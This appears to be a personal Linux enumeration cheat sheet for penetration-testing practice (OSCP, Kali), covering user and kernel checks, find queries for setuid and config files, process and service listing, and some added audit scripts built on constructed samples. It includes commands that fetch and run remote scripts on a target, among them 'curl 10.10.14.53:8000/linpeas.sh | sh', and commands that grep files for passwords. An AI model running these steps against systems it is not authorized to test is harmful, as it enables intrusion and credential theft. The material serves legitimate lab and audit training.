┌──(ntaheij㉿kali)-[~]
└─$ whoami
ntaheij
or alternatively use `id` to see more information about your uid and which groups you are in:
┌──(ntaheij㉿kali)-[~]
└─$ id
uid=1000(ntaheij) gid=1000(ntaheij) groups=1000(ntaheij),27(sudo)
Read the /etc/passwd file to see a list of users on the box:
$ cat /etc/passwd
Many of these users will relate to certain services, and not be a real person. Look for real users by filtering by those with a real login shell:
$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
ntaheij:x:1000:1000:ntaheij,,,:/home/ntaheij:/bin/bash
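Grepping for `sh` is a quick filter but it also matches on the username (for example `sshd`, whose shell is `nologin`). The added example below is not from the original note: it reads the seventh field of a passwd(5)-format file instead, using a constructed sample; point `interactive_users` at a real /etc/passwd to get the same "who can actually log in" view when auditing a host.

```shell
#!/bin/sh
# Added example (not from the original note): list accounts with a real login shell
# by checking the 7th field of passwd(5) rather than grepping the whole line for "sh".

# Constructed sample in /etc/passwd format: two human accounts, several service accounts.
SAMPLE_PASSWD=$(mktemp)
trap 'rm -f "$SAMPLE_PASSWD"' EXIT
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/bin/false
ntaheij:x:1000:1000:ntaheij,,,:/home/ntaheij:/bin/bash
backup-op:x:1001:1001::/home/backup-op:/bin/sh
EOF

# Print "user:uid:shell" for every entry whose shell is interactive.
# Shells ending in nologin, false or sync are treated as non-interactive.
interactive_users() {
    awk -F: '$7 !~ /(nologin|false|sync)$/ { print $1 ":" $3 ":" $7 }' "$1"
}

# Accounts with UID 0: more than one entry here deserves a closer look on an audit.
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

echo "interactive accounts:"
interactive_users "$SAMPLE_PASSWD"
echo "uid 0 accounts:"
uid0_accounts "$SAMPLE_PASSWD"
```

On the sample, `grep sh` would report `sshd` as well, while the field-based check returns only root, ntaheij and backup-op.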
┌──(ntaheij㉿kali)-[~]
└─$ uname -a
Linux kali 5.10.0-kali5-amd64 #1 SMP Debian 5.10.24-1kali1 (2021-03-23) x86_64 GNU/Linux
What does this mean?
The kernel is a central part of the operating system. This command tells you about the distribution (Kali Linux), the kernel version, and the word size (x86_64, i.e. 64-bit).
This command concatenates the contents of any readable files in the current working directory:
$ cat */*
It can be combined with a `grep` to look for passwords, for example:
$ cat */* | grep pass
However, it is not particularly efficient on a large number of files, so use it within a specific directory rather than across the whole filesystem.
Find files by user ownership (from this post)
$ find / -user userX
Find files by group ownership (from this post)
$ find / -group groupX
Find config files and redirect errors:
$ find / -name '*.conf' 2>/dev/null
Find suid files:
$ find . -perm /4000
Exclude a filename or other query with the `-not` or `!` operator:
$ find . -not -name "*.exe"
# exclude directories and files beginning with "sys"
$ find /var ! -name "sys*" ! -type d
As always, filter your output with `grep` if your find command is not granular enough:
# anything with "backup" in the name
$ find / -type f | grep backup
# get rid of stuff from /proc and /var/lib
$ find / -user user | grep -v 'proc\|var/lib'
# get rid of error messages (useful if the > operator doesn't work in a shell)
$ find / -user user | grep -v 'Permission denied'
You can even use regex in your find command with the `-regex` flag:
$ find ./ ! -regex '.*\(deb\|vmdk\)$'
Or use logical operators like `-o` (logical OR):
$ find /media/d/ -type f -size +50M ! \( -name "*deb" -o -name "*vmdk" \)
(both of the above examples from https://unix.stackexchange.com/questions/50612/how-to-combine-2-name-conditions-in-find#)
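The find options above (`-perm /4000`, `!`/`-not`, `2>/dev/null`, piping into grep) combine naturally into a setuid audit: list every setuid file under a tree and report the ones not on a known-good baseline. The script below is an added example, not from the original note; the directory tree, file names and baseline are all constructed in a temp directory so it runs anywhere. On a real host you would pass `/` and a baseline captured from a clean build.

```shell
#!/bin/sh
# Added example (not from the original note): find setuid files under a tree and
# diff them against a baseline. All paths below are constructed in a temp directory.
set -u
export LC_ALL=C
ROOT=$(mktemp -d)
BASELINE=$(mktemp)
trap 'rm -rf "$ROOT" "$BASELINE"' EXIT

# Constructed tree: two expected setuid binaries, a setuid copy under var/backups,
# a setuid .bak file, a sys/ subtree that should be skipped, and ordinary files.
mkdir -p "$ROOT/usr/bin" "$ROOT/var/backups" "$ROOT/sys/kernel"
for f in usr/bin/passwd usr/bin/sudo usr/bin/cat usr/bin/editor.bak \
         var/backups/shell_copy sys/kernel/notes; do
    : > "$ROOT/$f"
done
chmod 4755 "$ROOT/usr/bin/passwd" "$ROOT/usr/bin/sudo" \
           "$ROOT/var/backups/shell_copy" "$ROOT/usr/bin/editor.bak" "$ROOT/sys/kernel/notes"
chmod 0755 "$ROOT/usr/bin/cat"

# Constructed baseline: setuid paths (relative to ROOT) that are expected on this host.
printf '%s\n' usr/bin/sudo usr/bin/passwd > "$BASELINE"

# All setuid regular files under $1, relative to $1, sorted. -perm /4000 matches
# "setuid bit set", ! -path prunes the sys/ subtree, 2>/dev/null drops unreadable dirs.
find_suid() {
    find "$1" -type f -perm /4000 ! -path "$1/sys/*" 2>/dev/null \
        | sed "s|^$1/||" | sort
}

# Setuid files present on disk ($1) but absent from the baseline file $2.
unexpected_suid() {
    found=$(mktemp)
    find_suid "$1" > "$found"
    sort "$2" | comm -23 "$found" -
    rm -f "$found"
}

echo "setuid files:"
find_suid "$ROOT"
echo "not in baseline:"
unexpected_suid "$ROOT" "$BASELINE"
```

Anything printed under "not in baseline" is what you would investigate (or, on a system you defend, what a periodic cron job would alert on). The `.bak` file shows why name-based exclusions such as `! -name "*.bak"` are risky in an audit: a setuid bit on a stray copy matters regardless of its name.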
Install Linpeas from GitHub
–
IMPORTANT UPDATE: on 22/04/21 @_superhero1 on twitter revealed they failed OSCP because of a linpeas auto exploit regarding sudo tokens. They were eventually awarded the revoked points, but OffSec made it clear they would not be lenient in future. The offending auto exploit feature was removed, but you must make sure you use the fixed version of LinPeas, which has been confirmed by OffSec to be exam safe.
–
Placing linpeas.sh in ~/Documents/enum allows you to easily retrieve it with a simple python server. See [[Aliases#Useful Aliases|Useful Aliases]] for `enumserve` alias setup instructions.
On attacker machine:
$ enumserve
Find your IP address ([[Linux Networking#Get your IP]])
On target machine:
$ wget [IP]:8000/linpeas.sh
$ chmod +x linpeas.sh
$ ./linpeas.sh
You can also send it directly to `sh`/`bash` if `wget` is not installed:
$ curl 10.10.14.53:8000/linpeas.sh | sh
Sometimes firewall rules may prevent you from accessing port 8000 - try running the server on port 80 if you aren’t getting any results (requires root permissions):
$ sudo python3 -m http.server 80
/home
/var/www
/var/backups
/var/logs
/opt
/usr/share
/usr/share/local
List processes:
$ ps aux
Pspy monitoring:
$ wget [IP]:8000/pspy64
$ chmod +x pspy64
$ ./pspy64
List services:
$ netstat
$ ss -lntp
$ systemctl list-units --type=service --state=running
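`ss -lntp` tells you which TCP ports are listening and which process owns them, but the raw table is easier to act on once reduced to port, process and bind address. The script below is an added example, not from the original note: it parses constructed `ss -lntp` output (the process column is only filled in for sockets you own unless you are root) and flags listeners bound to every interface, which are the ones reachable from other hosts and worth checking against what the box is supposed to expose.

```shell
#!/bin/sh
# Added example (not from the original note): reduce `ss -lntp` output to
# "port process address" and flag listeners bound to all interfaces.
# SS_SAMPLE is constructed; on a real host use:  ss -lntp | listeners

SS_SAMPLE='State   Recv-Q  Send-Q   Local Address:Port   Peer Address:Port  Process
LISTEN  0       128            0.0.0.0:22          0.0.0.0:*      users:(("sshd",pid=812,fd=3))
LISTEN  0       80           127.0.0.1:3306        0.0.0.0:*      users:(("mysqld",pid=1045,fd=21))
LISTEN  0       511                  *:80                *:*      users:(("nginx",pid=930,fd=6),("nginx",pid=931,fd=6))
LISTEN  0       128               [::]:22             [::]:*      users:(("sshd",pid=812,fd=4))
LISTEN  0       4096         127.0.0.1:8000        0.0.0.0:*'

# One line per listener: port, process name ("-" when ss could not read it), bind address.
# Field 4 is Local Address:Port; the port is everything after the last colon, which also
# handles IPv6 forms such as [::]:22.
listeners() {
    awk 'NR > 1 {
        addr = $4; port = addr
        sub(/.*:/, "", port)
        sub(/:[^:]*$/, "", addr)
        proc = "-"
        if (match($6, /"[^"]*"/)) proc = substr($6, RSTART + 1, RLENGTH - 2)
        print port, proc, addr
    }'
}

# Only listeners bound to a wildcard address: 0.0.0.0 or * for IPv4, [::] for IPv6.
exposed_listeners() {
    listeners | awk '$3 == "0.0.0.0" || $3 == "*" || $3 == "[::]"'
}

echo "all listeners:"
printf '%s\n' "$SS_SAMPLE" | listeners
echo "exposed to other hosts:"
printf '%s\n' "$SS_SAMPLE" | exposed_listeners
```

In the sample, mysqld on 127.0.0.1:3306 and the unnamed service on 127.0.0.1:8000 are local-only, while sshd and nginx are reachable from the network; the "-" process entry on port 8000 is the case to chase down with `ps aux` or pspy when you are not root.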
Why is this useful?
#cheat-sheet #enum #unix